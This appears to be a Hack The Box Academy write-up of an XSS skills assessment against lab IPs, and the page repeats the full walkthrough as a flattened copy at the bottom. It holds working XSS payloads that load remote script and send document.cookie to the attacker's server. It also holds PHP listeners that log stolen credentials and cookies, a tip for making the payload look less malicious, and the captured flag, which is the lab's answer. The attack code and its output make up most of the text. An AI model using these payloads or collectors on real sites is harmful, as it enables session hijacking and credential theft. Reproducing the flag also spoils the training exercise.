CROSS-SITE SCRIPTING (XSS)

Completed Cross-Site Scripting (XSS)academy.hackthebox.com

OBJECTIVE: test the organization's web application against Cross-Site Scripting vulnerabilities (XSS).

TASKS:

identify a user-input field that is vulnerable to an XSS vulnerability
find a working XSS payload that executes JavaScript code on the target's browser
using the Session Hijacking techniques, try to steal the victim's cookies, which should contain the flag

What is the value of the 'flag' cookie?

#identify xss vulnerable input fields
root@oco:~$ mkdir -p /tmp/tmpserver
root@oco:~$ cd /tmp/tmpserver
root@oco:~$ nano /tmp/tmpserver/index.php #at this step we wrote our index.php file
 <?php
   if (isset($_GET['username']) && isset($_GET['password'])) {
     $file = fopen("creds.txt", "a+");
     fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
     header("Location: http://10.10.15.203:8080/phishing/index.php");
     fclose($file);
     exit();
   }
 ?>
root@oco:~$ sudo php -S 0.0.0.0:8080
 PHP 7.4.15 Development Server (http://0.0.0.0:8080) started
 
#XSS payload options
 <script src=http://10.10.15.203:8080>fieldName</script>
 '><script src=http://10.10.15.203:8080>fieldName</script>
 "><script src=http://10.10.15.203:8080>fieldName</script>
 javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
 <script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
 <script>$.getScript("http://OUR_IP")</script>

root@oco:~$ BROWSER > http://10.129.1.33/assessment/index.php > Recent Posts > Welcome to Security Blog
 input field - comment: <script src=http://10.10.15.203:8080>comment</script>
 input field - name: <script src=http://10.10.15.203:8080>name</script>
 input field - email: <script src=http://10.10.15.203:8080>email</script>
 input field - website <script src=http://10.10.15.203:8080>website</script> <-- vulnerable field
 Post Comment...
 * the working xss payload with the field name that calls the attacking server
   will represent the vulnerable field
   
#cookie stealing payloads
 document.location='http://OUR_IP/index.php?c='+document.cookie;
 new Image().src='http://OUR_IP/index.php?c='+document.cookie;
 * the second payload 'new Image()... is preferred as it simply adds an image to the page, which may not be very malicious looking

#server setup
root@oco:~$ mkdir -p /tmp/tmpserver
root@oco:~$ cd /tmp/tmpserver
root@oco:~$ nano /tmp/tmpserver/index.php #at this step we wrote our index.php file 
 <?php
   if (isset($_GET['c'])) {
     $list = explode(";", $_GET['c']);
     foreach ($list as $key => $value) {
       $cookie = urldecode($value);
       $file = fopen("cookies.txt", "a+");
       fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
       fclose($file);
     }
   }
 ?>
 
root@oco:~$ sudo php -S 0.0.0.0:8080
 PHP 7.4.15 Development Server (http://0.0.0.0:8080) started
 
#payload setup
root@oco:~$ sudo nano script.js
 new Image().src='http://10.10.15.203:8080/index.php?c='+document.cookie;
root@oco:~$ ls
 index.php  script.js

#exploit
root@oco~:$ BROWSER > http://10.129.1.33/assessment/index.php > Recent Posts > Welcome to Security Blog
 comment field: N/A
 name field: null
 email field: [email protected]
 website field: <script src=http://10.10.15.203:8080>script.js</script>
 Post Comment...
 
 [Tue Nov  5 21:02:26 2024] 10.129.1.33:37570 [200]: GET /index.php?c=wordpress_test_cookie=WP%20Cookie%20check;%20wp-settings-time-2=1730862185;%20flag=HTB{cr055_5173_5cr1p71n6_n1nj4}
 [Tue Nov  5 21:02:26 2024] 10.129.1.33:37570 Closing  
 
root@oco:~$ cat cookies.txt
 Victim IP: 10.129.1.33 | Cookie: wordpress_test_cookie=WP Cookie check
 Victim IP: 10.129.1.33 | Cookie:  wp-settings-time-2=1730862185
 Victim IP: 10.129.1.33 | Cookie:  flag=HTB{cr055_5173_5cr1p71n6_n1nj4}

PreviousJAVASCRIPT DEOBFUSCATION NextSQL INJECTION

Last updated 24 days ago

#identify xss vulnerable input fields root@oco:~$ mkdir -p /tmp/tmpserver root@oco:~$ cd /tmp/tmpserver root@oco:~$ nano /tmp/tmpserver/index.php #at this step we wrote our index.php file <?php if (isset($_GET['username']) && isset($_GET['password'])) { $file = fopen("creds.txt", "a+"); fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n"); header("Location: http://10.10.15.203:8080/phishing/index.php"); fclose($file); exit(); } ?> root@oco:~$ sudo php -S 0.0.0.0:8080 PHP 7.4.15 Development Server (http://0.0.0.0:8080) started #XSS payload options <script src=http://10.10.15.203:8080>fieldName</script> '><script src=http://10.10.15.203:8080>fieldName</script> "><script src=http://10.10.15.203:8080>fieldName</script> javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)') <script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script> <script>$.getScript("http://OUR_IP")</script> root@oco:~$ BROWSER > http://10.129.1.33/assessment/index.php > Recent Posts > Welcome to Security Blog input field - comment: <script src=http://10.10.15.203:8080>comment</script> input field - name: <script src=http://10.10.15.203:8080>name</script> input field - email: <script src=http://10.10.15.203:8080>email</script> input field - website <script src=http://10.10.15.203:8080>website</script> <-- vulnerable field Post Comment... * the working xss payload with the field name that calls the attacking server will represent the vulnerable field #cookie stealing payloads document.location='http://OUR_IP/index.php?c='+document.cookie; new Image().src='http://OUR_IP/index.php?c='+document.cookie; * the second payload 'new Image()... is preferred as it simply adds an image to the page, which may not be very malicious looking #server setup root@oco:~$ mkdir -p /tmp/tmpserver root@oco:~$ cd /tmp/tmpserver root@oco:~$ nano /tmp/tmpserver/index.php #at this step we wrote our index.php file <?php if (isset($_GET['c'])) { $list = explode(";", $_GET['c']); foreach ($list as $key => $value) { $cookie = urldecode($value); $file = fopen("cookies.txt", "a+"); fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n"); fclose($file); } } ?> root@oco:~$ sudo php -S 0.0.0.0:8080 PHP 7.4.15 Development Server (http://0.0.0.0:8080) started #payload setup root@oco:~$ sudo nano script.js new Image().src='http://10.10.15.203:8080/index.php?c='+document.cookie; root@oco:~$ ls index.php script.js #exploit root@oco~:$ BROWSER > http://10.129.1.33/assessment/index.php > Recent Posts > Welcome to Security Blog comment field: N/A name field: null email field: [email protected] website field: <script src=http://10.10.15.203:8080>script.js</script> Post Comment... [Tue Nov 5 21:02:26 2024] 10.129.1.33:37570 [200]: GET /index.php?c=wordpress_test_cookie=WP%20Cookie%20check;%20wp-settings-time-2=1730862185;%20flag=HTB{cr055_5173_5cr1p71n6_n1nj4} [Tue Nov 5 21:02:26 2024] 10.129.1.33:37570 Closing root@oco:~$ cat cookies.txt Victim IP: 10.129.1.33 | Cookie: wordpress_test_cookie=WP Cookie check Victim IP: 10.129.1.33 | Cookie: wp-settings-time-2=1730862185 Victim IP: 10.129.1.33 | Cookie: flag=HTB{cr055_5173_5cr1p71n6_n1nj4}